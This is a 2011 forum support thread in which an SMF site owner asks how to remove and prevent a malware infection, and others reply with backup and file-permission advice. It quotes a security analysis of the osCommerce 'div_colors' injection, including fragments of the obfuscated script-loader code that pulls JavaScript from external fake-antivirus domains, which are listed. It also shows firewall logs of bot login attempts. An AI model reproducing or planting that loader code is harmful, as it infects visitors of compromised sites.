Forum hacked with Maleware - how to remove.. and defend?

Started by gornde, March 30, 2011, 03:51:51 AM

Previous topic - Next topic
Print
Go Down Pages1
User actions

gornde

March 30, 2011, 03:51:51 AM
Hello,

my page is hxxp:ww.gorn.de [nonactive] my page has been infected today with: hxxp:sucuri.net [nonactive] / malware / malware-entry-mwjs1240

how can i remove it? and how can an prevent this?

Thanks for help.. and i really do need help!

Gorn

gornde

#1
March 30, 2011, 04:05:43 AM
i removed it.. but i really dont know how to prevent these attacks.. please help me.

because i cant link anything.. i quote

QuoteWe are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

    if (typeof(redef_colors)=="undefined") {
    var div_colors = new Array("#4b8272′, "#81787f', '#832f83′, '#887f74′, '#4c3183′, '#748783′, '#3e7970′, '#857082′, '#728178′, '#7f8331′, '#2f8281′, '#724c31′, '#778383′, '#7f493e', '#3e7a84′, '#82837e', '#40403d', '#727e7c', '#3e7982′, '#3e7980′, '#847481′, '#883d7c', '#787d3d', '#7f777f', "#314d00′);..

    var redef_colors = 1;
    var colors_picked = 0;

    function div_pick_colors(t,styled) {
    ..


As you can see, it looks like a valid JavaScript and that's what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

    var new_cstyle=document.createElement("script");
    new_cstyle..type="text/javascript";
    new_cstyle..src=div_pick_colors(div_colors,0);
    document.getElementsByTagName("head")[0]. appendChild(new_cstyle);

Where is it lloading the malicious code from?

Right now, it is loading from hxxp:tongho.co.th/engine/ [nonactive], but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of the some of the domains used so far:

    hxxp:tongho.co.th/engine/ [nonactive]

    hxxp:againstvirusxpsoft.com [nonactive]
    hxxp:antiagencyxpsoft.com [nonactive]
    hxxp:antivirixpsoft.com [nonactive]
    hxxp:antivirusxpeasy.com [nonactive]
    hxxp:antivirusxphard.com [nonactive]
    hxxp:antivirusxpinfected.com [nonactive]
    hxxp:antivirusxpsoftcentral.com [nonactive]
    hxxp:antivirusxpsoft.com [nonactive]
    hxxp:antivirusxpsoftonline.com [nonactive]
    hxxp:egyptantivirusxp.com [nonactive]
    hxxp:infectedvirusxpsoft.com [nonactive]
    hxxp:myantivirusxpsoft.com [nonactive]
    hxxp:myxpscanantivirus.com [nonactive]
    hxxp:protestersantivirusxp.com [nonactive]
    hxxp:protestersantivirusxpsoft.com [nonactive]
    hxxp:protesterscanantivirus.com [nonactive]
    hxxp:protesterscanantivirusxp.com [nonactive]
    hxxp:protestersscanantivirus.com [nonactive]
    hxxp:protestersvirusxpsoft.com [nonactive]
    hxxp:scanantivirixp.com [nonactive]
    hxxp:theantivirusxpsoft.com [nonactive]
    hxxp:thexpscanantivirus.com [nonactive]
    hxxp:webantivirusxpsoft.com [nonactive]
    hxxp:webxpscanantivirus.com [nonactive]
    hxxp:xpexamineantivirus.com [nonactive]
    hxxp:xpscanagainstvirus.com [nonactive]
    hxxp:xpscanantiagency.com [nonactive]
    hxxp:xpscanantibacteria.com [nonactive]
    hxxp:xpscanantiviri.com [nonactive]
    hxxp:xpscanantiviruscentral.com [nonactive]
    hxxp:xpscanantivirus.com [nonactive]
    hxxp:xpscanantivirusonline.com [nonactive]
    hxxp:xpscanantivirusprotesters.com [nonactive]
    hxxp:xpscanwarvirus.com [nonactive]
    hxxp:xpseeantivirus.com [nonactive]

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

    <frame src ="hxxp:86.55.140.203/index2.php [nonactive]" ..
    <frame src="hxxp:solomon-vl.cz.cc/show.php?key=fcfe7c10d4f05fa29b45456408269fdc&u= [nonactive]..

It's a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected.

ziycon

#2
March 30, 2011, 05:06:18 AM
I would recommend your to restore your whole site/forum from a recent back up before the problems started to occur and then consult your hosting company on how to secure your site from this type of attack, have you got a very easy to guess FTP password or a file upload function on your site?

gornde

#3
March 30, 2011, 05:26:02 AM
you think that it was not a script attack to smf? more a serverside attack?

ziycon

#4
March 30, 2011, 05:35:19 AM
It could have been done many ways depending on your hosting setup and what your site is serving. Its just to rule out that the attack came through your site as opposed to the host or another means.

Arantor

#5
March 30, 2011, 06:02:33 AM
Well, there are no known security vulnerabilities in SMF at the present time, such attacks are usually through improper permissions or configurations on the server side, or vulnerabilities in other scripts present on the server.

gornde

#6
March 30, 2011, 07:41:19 AM Last Edit: March 30, 2011, 08:00:45 AM by gornde
oh ok, then i have to check my folder permissions.. is there is "list" which folder or file needs more then 644 permission?


Oh one moment: the problem occured after installing the Firewall Mod. All files of this mod had 755 permission.. may it came this way.

are there some usefull security mods?

Arantor

#7
March 30, 2011, 08:12:13 AM
Quoteis there is "list" which folder or file needs more then 644 permission?

No file needs beyond 644 (folders themselves have to be 755, but the files within 644) normally except for:
* attachments folder has to be writable to be able to add attachments
* files and folders tend to need higher permissions when installing mods because mods modify the raw files directly

755 is only slightly different to 644, all it means is that the file is 'executable', a flag which has no meaning for most PHP files, certainly not SMF's or mod PHP files.

gornde

#8
March 30, 2011, 08:34:41 AM
ok thanks. then i really dont know how this maleware came in....

maybe we will see us tomorrow ... but hopefully it wont come back. THX

here some more infos:

http:// networkedblogs. com/fY7bu

gornde

#9
March 31, 2011, 08:05:47 AM
Hi all together.

My Board is still on. I installed the Firewall mod .. and now i see, that my log gets flooded.

about every 4 to 10 seconds one Entry like this

Quote590    Keep-Alive    2011-03-31 05:22:01    GET /index.php?board=1.0;sort=last_post HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM) hxxp:www.gorn.de/index.php?board=1.0;sort=last_post [nonactive]    Invalid ip!
589    Keep-Alive    2011-03-31 05:21:57    GET /index.php?board=1.0 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM) hxxp:www.gorn.de/index.php?board=1.0 [nonactive]    Invalid ip!

OR BOTS trying to access (this is not a USER!)

Quote675    Keep-Alive    2011-03-31 08:21:31    POSTuser: taliajaxBaw passwrd: 9IsptQy481 cookielength: 60 submit: Login hash_passwrd: /index.php?action=login2 HTTP/1.0 Opera/9.00 (Windows NT 4.0; U; en) hxxp:www.gorn.de/index.php?action=login [nonactive]    Invalid ip!

Do you have the same count of entrys?

Print
Go Up Pages1
User actions
Advertisement: